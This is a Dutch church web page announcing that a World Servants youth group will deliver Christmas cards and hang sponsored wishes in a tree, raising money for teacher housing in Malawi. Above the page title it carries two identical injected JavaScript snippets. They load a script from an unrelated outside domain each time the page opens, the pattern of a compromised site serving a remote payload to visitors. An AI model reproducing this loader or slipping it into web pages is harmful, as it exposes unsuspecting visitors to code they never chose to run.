;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerstkaarten laten bezorgen door World Servants Veenwouden/Damwoude - PKN Damwâld

Kerstkaarten laten bezorgen door World Servants Veenwouden/Damwoude

Gepubliceerd op: dinsdag 6 december 2022

Heeft u dit jaar geen zin of tijd om kerstkaarten te bezorgen in omgeving Dantumadiel? Wij doen het graag voor u! Voor 0,80 cent per kaart bezorgen wij ze. Lever uw kaarten voorzien van een adres en het geld in op De Wâl 81C, Feanwâldsterwâl of op Badhúswei 30, Damwâld.

Doneren kan ook via www.geef.ws/kerstkaart (o.v.v. aantal kaarten en naam afzender). Voor vragen mail gerust naar veenwouden@worldservants.nl

Speciale actie: Uw kerstwens in de boom op de Koemarkt!

Op de Koemarkt in Feanwâlden staat ook dit jaar weer een kerstboom. Graag willen we deze versieren met jullie persoonlijke boodschap. Heeft u iemand aan wie u speciaal denkt deze kerst of een andere hoopvolle boodschap die u in de boom wilt hangen? Sponsor onze actie dan met € 2,50 & wij hangen uw persoonlijke wens in de boom.

Wij voeren acties zodat wij in de zomer van 2023 een project met World Servants kunnen doen! Dit doen we door lerarenwoningen te bouwen in Malawi om het onderwijs te verbeteren. Help(t) u/jij mee? Bedankt!

Voor een klein prijsje brengen we uw kerstkaarten op het juiste adres, zo hoeft u zelf niet door de kou en helpt u een goed doel!

Meer informatie? veenwouden@worldservants.nl